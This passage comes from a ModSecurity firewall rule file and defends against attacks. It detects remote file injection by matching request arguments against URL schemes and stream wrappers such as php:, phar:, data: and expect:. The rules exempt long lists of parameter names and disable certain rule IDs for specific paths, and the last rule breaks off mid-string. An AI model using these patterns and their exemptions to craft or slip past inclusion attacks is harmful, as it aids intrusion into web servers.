SecRule REQUEST_URI|ARGS|!ARGS:id|!ARGS:kotisivu|!ARGS:mb|!ARGS:jibber|!ARGS:wordpress_extra|!ARGS:origin|!ARGS:pattern_select|!ARGS:fail|!ARGS:success|!ARGS:move_to|!ARGS:/^listingfields/|!ARGS:svc_id|!ARGS:/^constant_contact/|!ARGS:hq|!ARGS:/flsrv/|!ARGS:svc_id|!ARGS:/foto/|!ARGS:junkWords|!ARGS:name_ip|!ARGS:/stream/|!ARGS:canonical|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:f_content|!ARGS:email_forward|!ARGS:bannercode|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:file_contents|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:short_story|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:p_content|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:320163,rev:287,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"


SecMarker END_RULES_92126

SecRule REQUEST_FILENAME "/theme/functions/upload\.php" "phase:2,id:92127,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"

SecRule REQUEST_FILENAME "/showimage\.php\.jpg" "phase:2,id:92128,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340035"

SecRule REQUEST_FILENAME "/forums/admin/index\.php" "phase:2,id:92129,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
SecAction "phase:2,id:92130,t:none,pass,nolog,skipAfter:END_RULES_92130"

SecRule ARGS|!ARGS:/field_/|!ARGS:id|!ARGS:/addy/|!ARGS:rel_path|!ARGS:aim|!ARGS:api|!ARGS:details|!ARGS:/^field/|!ARGS:profile_id|!ARGS:/^complete_action/|!ARGS:/^option_value/|!ARGS:/buzz/|!ARGS:cc_list_id|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:^/xcpr_/|!ARGS:back|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:catalogue_search_code|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:service|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:/^input_/|!ARGS:embed_code|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:refsrc|!ARGS:hp|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:loc|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/photo/|!ARGS:/logo/|!ARGS:go|!ARGS:/^utm/|!ARGS:resolution|!ARGS:/export/|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:/click/|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:/^win/|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:attribute29|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:/server/|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:/body/|!ARGS:/^product_long_/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:customer_footer|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:pathToPiwik|!ARGS:admin_footer|!ARGS:email_sig|!ARGS:/^artsee_banner_/|!ARGS:pingback_service|!ARGS:showStr|!ARGS:/hostname/|!ARGS:/http/|!ARGS:bannercode|!ARGS:email_forward|!ARGS:fetch|!ARGS:/txt/|!ARGS:mesg|!ARGS:forward|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:footer_scripts|!ARGS:advBannerMessage|!ARGS:u|!ARGS:/header/|!ARGS:action|!ARGS:cptpl_dir|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:cat_sponsor|!ARGS:stretch|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:newsettings[files_dir]|!ARGS:contactMessage|!ARGS:var_value[usps_labels_help_2]|!ARGS:short_story|!ARGS:vinculo|!ARGS:cts|!ARGS:response|!ARGS:hd_request|!ARGS:relocate|!ARGS:add_fd3|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:/link/|!ARGS:faqText|!ARGS:request_uri|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:dynadata[_SIGNATURE]|!ARGS:paypal_ipn|!ARGS:title|!ARGS:/frame/|!ARGS:l1_bdy|!ARGS:theMessage|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:uri|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:base1|!ARGS:layout|!ARGS:EditorHTML|!ARGS:theVisibility|!ARGS:friend_M|!ARGS:before|!ARGS:option[home]|!ARGS:sm_b_style|!ARGS:success|!ARGS:/^css/|!ARGS:short_story|!ARGS:vthumb|!ARGS:introduction|!ARGS:register_at|!ARGS:statusaddress|!ARGS:revnews_ad_120|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:option[78]|!ARGS:agendWebPage|!ARGS:/icon/|!ARGS:/ftp/|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:note|!ARGS:c_msg|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:helpbox|!ARGS:ureferrer|!ARGS:redir|!ARGS:refertoyouby|!ARGS:ret|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:notes|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:refer|!ARGS:oldmsg|!ARGS:/referer/|!ARGS:/refer/|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:from|!ARGS:footer|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:fb_ref|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:ret|!ARGS:area|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:320164,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{MATCHED_VAR}'"
SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/" "t:none,t:urlDecodeUni,t:lowercase"

SecRule REQUEST_URI|ARGS|!ARGS:/field_/|!ARGS:aim|!ARGS:/^field/|!ARGS:details|!ARGS:/^complete_action/|!ARGS:profile_id|!ARGS:api|!ARGS:/^option_value/|!ARGS:button_src|!ARGS:cc_list_id|!ARGS:/buzz/|!ARGS:/jform/|!ARGS:/liveUpdate/|!ARGS:/service/|!ARGS:marqueur|!ARGS:/vertex/|!ARGS:metavalue|!ARGS:binary|!ARGS:snippet|!ARGS:/^ZA_ARTICLE/|!ARGS:obr|!ARGS:back|!ARGS:^/xcpr_/|!ARGS:/pic/|!ARGS:/plaatje/|!ARGS:profile|!ARGS:repository|!ARGS:/export/|!ARGS:os|!ARGS:ticketmaster|!ARGS:/destination/|!ARGS:r|!ARGS:/speedtest/|!ARGS:voice|!ARGS:/tripadvisor/|!ARGS:/iTunes/|!ARGS:lang_default_value|!ARGS:weather|!ARGS:/metakey/|!ARGS:/target/|!ARGS:/password/|!ARGS:/note/|!ARGS:form_profile|!ARGS:/theme/|!ARGS:ip|!ARGS:/afbeelding/|!ARGS:/screenshot/|!ARGS:embed_code|!ARGS:/^input_/|!ARGS:/^flb/|!ARGS:gwefan|!ARGS:/xthreads/|!ARGS:flv|!ARGS:dest|!ARGS:languageChange|!ARGS:/^perch_/|!ARGS:music|!ARGS:/^p_posts/|!ARGS:input_50|!ARGS:/resolv/|!ARGS:/^install_package/|!ARGS:/address/|!ARGS:wlp|!ARGS:hp|!ARGS:refsrc|!ARGS:/censor/|!ARGS:UpdateNote|!ARGS:regx_root|!ARGS:input_3|!ARGS:file|!ARGS:/avatar/|!ARGS:obj_itop|!ARGS:/feed/|!ARGS:value_string_9|!ARGS:/^cf/|!ARGS:/uri/|!ARGS:color_chart|!ARGS:ui|!ARGS:armoury|!ARGS:reverbnation|!ARGS:/return/|!ARGS:fromp|!ARGS:/site/|!ARGS:_ref|!ARGS:owa_protocol|!ARGS:sfhome|!ARGS:live|!ARGS:/^func_key/|!ARGS:/trackback/|!ARGS:gmaps|!ARGS:locationhp|!ARGS:pfad|!ARGS:CUSTID|!ARGS:/img/|!ARGS:/^obj_/|!ARGS:direct|!ARGS:fflv|!ARGS:direct|!ARGS:source_location/|!ARGS:/^fetch/|!ARGS:/web/|!ARGS:/openid/|!ARGS:/adres/|!ARGS:/logo/|!ARGS:go|!ARGS:resolution|!ARGS:catalogue_search_code|!ARGS:/link/|!ARGS:new_channel|!ARGS:/wsdl/|!ARGS:/soap/|!ARGS:path[alias]|!ARGS:/message/|!ARGS:/^utm/|!ARGS:fighter_name|!ARGS:/^element/|!ARGS:camefrom|!ARGS:ucapi|!ARGS:clickTag1|!ARGS:rf|!ARGS:payment_home|!ARGS:sourcetitle|!ARGS:form_pathscript|!ARGS:embeddump|!ARGS:/www/|!ARGS:/page/|!ARGS:hdwok|!ARGS:result|!ARGS:/^setting/|!ARGS:store|!ARGS:continue|!ARGS:/href/|!ARGS:dcsref|!ARGS:lec_rm|!ARGS:n-state|!ARGS:CP_email|!ARGS:eself|!ARGS:tax23_RefDocLoc|!ARGS:goback|!ARGS:OVRAW|!ARGS:outputfile|!ARGS:background|!ARGS:dcsref|!ARGS:path|!ARGS:ico|!ARGS:big|!ARGS:/^clickTagFrame/|!ARGS:/^attr/|!ARGS:gmu|!ARGS:entry|!ARGS:tos|!ARGS:/image/|!ARGS:user_xup|!ARGS:value_3|!ARGS:request|!ARGS:confirm|!ARGS:/^groups/|!ARGS:came_from|!ARGS:prodLogo|!ARGS:prodDownload|!ARGS:/^V_feed/|!ARGS:itemIntro|!ARGS:photo|!ARGS:/^stylevar/|!ARGS:dcsqry|!ARGS:typePageCode|!ARGS:/^GARS_existing/|!ARGS:rules|!ARGS:/^config/|!ARGS:/^revchurch/|!ARGS:goto|!ARGS:loc|!ARGS:/body/|!ARGS:/^product_long/|!ARGS:/server/|!ARGS:/content/|!ARGS:banner_top|!ARGS:banners_list|!ARGS:heading|!ARGS:packageComments|!ARGS:cl_post|!ARGS:board_msg|!ARGS:/html/|!ARGS:arg2|!ARGS:/^cf_field_/|!ARGS:msg|!ARGS:configuration_key|!ARGS:search|!ARGS:/comment/|!ARGS:enquiry|!ARGS:/desc/|!ARGS:/footer/|!ARGS:FAQTitle|!ARGS:host|!ARGS:/text/|!ARGS:whereto|!ARGS:item[content]|!ARGS:pathToPiwik|!ARGS:email_sig|!ARGS:minicms_content|!ARGS:feed|!ARGS:/^artsee_banner_/|!ARGS:fetch|!ARGS:pingback_service|!ARGS:/hostname/|!ARGS:/http/|!ARGS:f_content|!ARGS:email_forward|!ARGS:bannercode|!ARGS:mesg|!ARGS:forward|!ARGS:atc_content|!ARGS:announce_post|!ARGS:/^data/|!ARGS:/template/|!ARGS:teaser_js|!ARGS:/^item_/|!ARGS:question_content|!ARGS:u|!ARGS:header|!ARGS:action|!ARGS:cptpl_dir|!ARGS:file_contents|!ARGS:contents|!ARGS:arg6|!ARGS:dbhost|!ARGS:copyright|!ARGS:ima|!ARGS:art_summary|!ARGS:art_source|!ARGS:stretch|!ARGS:cat_sponsor|!ARGS:automode|!ARGS:myfilm1|!ARGS:/^tp_article/|!ARGS:relocate|!ARGS:add_fd3|!ARGS:headers-28|!ARGS:soundname|!ARGS:bbcode_tpl|!ARGS:faqText|!ARGS:/google/|!ARGS:definition|!ARGS:tpl_cont|!ARGS:/domain/|!ARGS:searchstring|!ARGS:new_tng_path|!ARGS:babynaam|!ARGS:Comentario|!ARGS:/^dynadata/|!ARGS:paypal_ipn|!ARGS:title|!ARGS:right_frame|!ARGS:l1_bdy|!ARGS:edit_full|!ARGS:article|!ARGS:forum|!ARGS:wp_home|!ARGS:/^ViewState/|!ARGS:postvars|!ARGS:vars[DBhostname]|!ARGS:base1|!ARGS:cart_header|!ARGS:layout|!ARGS:short_story|!ARGS:/sponsor_banner/|!ARGS:newText|!ARGS:PageCopy|!ARGS:amp;loc|!ARGS:f_header|!ARGS:option[78]|!ARGS:savecontent|!ARGS:agendWebPage|!ARGS:/ftp/|!ARGS:gen_header|!ARGS:button_dir|!ARGS:x_organizational|!ARGS:form_element3|!ARGS:answer|!ARGS:intro|!ARGS:c_msg|!ARGS:note|!ARGS:domain|!ARGS:how_did_you_hear_about_us|!ARGS:back_to|!ARGS:/sql/|!ARGS:prefix|!ARGS:clickTAG|!ARGS:problem|!ARGS:default_banner|!ARGS:archive_chrono|!ARGS:home|!ARGS:thm|!ARGS:_RW_|!ARGS:/rss/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:outbound|!ARGS:out|!ARGS:/refer/|!ARGS:helpbox|!ARGS:redir|!ARGS:oaparams|!ARGS:loc|!ARGS:resource|!ARGS:wimpyApp|!ARGS:wimpySkin|!ARGS:params[altTag]|!ARGS:filecontent|!ARGS:inc|!ARGS:fck_brief|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:Post|!ARGS:reply|!ARGS:last_msg|!ARGS:tresc|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:view|!ARGS:howhear|!ARGS:oldmsg|!ARGS:/^FCKeditor/|!ARGS:excerpt|!ARGS:saved_data|!ARGS:signature|!ARGS:disc|!ARGS:utmr|!ARGS:user[signature]|!ARGS:Query|!ARGS:steps|!ARGS:bbcode_replace|!ARGS:jumpTo|!ARGS:memo|!ARGS:flvSource|!ARGS:_docSelector|!ARGS:goto|!ARGS:from|!ARGS:cmstr|!ARGS:remotefile|!ARGS:location|!ARGS:dest|!ARGS:Dialog30|!ARGS:Dialog7|!ARGS:configParams[api][configParamValue]|!ARGS:/^wimpy/|!ARGS:msgpreview|!ARGS:fb_ref|!ARGS:notes|!ARGS:pn_domain|!ARGS:newidentities[0][signature]|!ARGS:addendum|!ARGS:utmp|!ARGS:whydowork_code|!ARGS:value_190|!ARGS:pp_bio_content|!ARGS:/ajax/|!ARGS:backto|!ARGS:/^rsargs/|!ARGS:op|!ARGS:BLK_block_content|!ARGS:ret|!ARGS:Store_CustomerEmail_Header|!ARGS:old_file[]|!ARGS:zajawka|!ARGS:summary|!ARGS:input_name[4]|!ARGS:input_name[0]|!ARGS:area|!ARGS:content|!ARGS:/^data\[tt_content\]/|!ARGS:Brief_Profile|!ARGS:summary|!ARGS:data|!ARGS:newcontent|!ARGS:st_widget|!ARGS:ban_reason|!ARGS:def|!ARGS:data[Email][comment]|!ARGS:playlist|!ARGS:enlace|!ARGS:data_codepress|!ARGS:home_top|!ARGS:Store_OUI_GlobalFooter|!ARGS:map|!ARGS:dynafield[_SIGNATURE]|!ARGS:payment_extrainfo|!ARGS:cta_content|!ARGS:wysiwyg|!ARGS:banner|!ARGS:env_ping_list|!ARGS:subdir[0]|!ARGS:x_Instructions|!ARGS:cta_content|!ARGS:f_license|!ARGS:env_ping_list|!ARGS:xsponsor2|!ARGS:code|!ARGS:p_content|!ARGS:/^k2extra/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,multimatch,id:320165,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS 